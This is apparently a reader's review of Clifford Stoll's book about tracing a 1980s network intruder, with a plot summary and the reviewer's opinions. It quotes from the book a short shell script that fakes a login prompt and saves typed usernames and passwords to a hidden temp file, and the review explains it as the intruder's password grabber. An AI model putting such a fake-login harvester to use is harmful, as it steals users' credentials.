It's the Reagan administration and although your government research job is unrelated to computer desktop and network maintenance, you've had several such duties deposited into your lap, which became several more. Now you're responsible for solving a summation problem in the accounting program that charges other departments for using time on your system (remember the earliest incarnations of 'time sharing'?). The issue is that there's a bit of time that's been used and no one's paid for it. Digging into the relevant sessions, you notice an account that's been used recently, but was set up for someone who departed for another job two years ago. Questioning of that person and others around him or her deletes the original owner from suspicion. You begin attempting to find out how the current user of that account figured out how to use it - and from where...
Clifford Stoll's classic story of involvement in serious espionage messes begins in this massively plausible way. It was recommended to me by an NT-era MCSE; I proceeded to enjoy the book in spite of myself. But although I'd heard from various (inaccurate) sources that it involved "viruses", I was at least a little surprised to read the following lines early in the story:
echo -n "WELCOME TO THE LBL UNIX-4 COMPUTER"
echo -n "PLEASE LOG IN NOW"
echo -n "LOGIN:"
read account_name
echo -n "ENTER YOUR PASSWORD:"
(stty -echo; \
read password; \
stty echo;\
echo "";\
echo $account_name $password >> /tmp/.pub)
echo "SORRY, TRY AGAIN."
This isn't a random vandalism attempt and not a program that's attempting to replicate over adjacent machines. Somewhat obviously, it's a password grabber that appends the grabbed string to a file and then allows the user to proceed to the real logger-inner. It's a purpose-built program to harvest logins for the sneak thief that's arrogated control of an old account to him, her or its self. It was placed there by whoever broke and entered.
Stoll made the commendable decision not to interfere with the sneak, but to observe the sneak's actions over time. Time revealed that although root was attained, backdoors were installed and files were read, not much time was spent actually reading the files. The sneak proceeded over the LAN to other computers and did the same. The sneak wasn't so much interested in the data (which was downloaded by him) but in the network - the connections over which he could travel to other destinations. And they weren't just unclassified science projects like Stoll's astronomy research post; they mostly included sensitive stuff. Stoll began consulting with the three-letter agencies and the plot thickened.
What follows is not only a story of network research in the days before the consumer internet (which is not a terribly large part of the story) but a common litany of woes regarding having to deal not only with spooks that aren't at liberty to say whether you're full of baloney or not, but with layers and layers of middle management that have no power to say 'yes', but plenty to say 'no'. Without giving much away, I'll say that Stoll laboriously traces the sneak out of the building, out of the organization, away from the West coast to New Jersey, over the transatlantic cable and, modem by modem (that's Modulator/DeModulator, junior) into a situation that begins to address diplomatic issues among countries both allied to us and... perhaps not.
There would be many morals here. The first one that occurs to me is not to let responsibility creep get you thrown into prison, let alone rooked out of a fair paycheck. Five stars out of four.
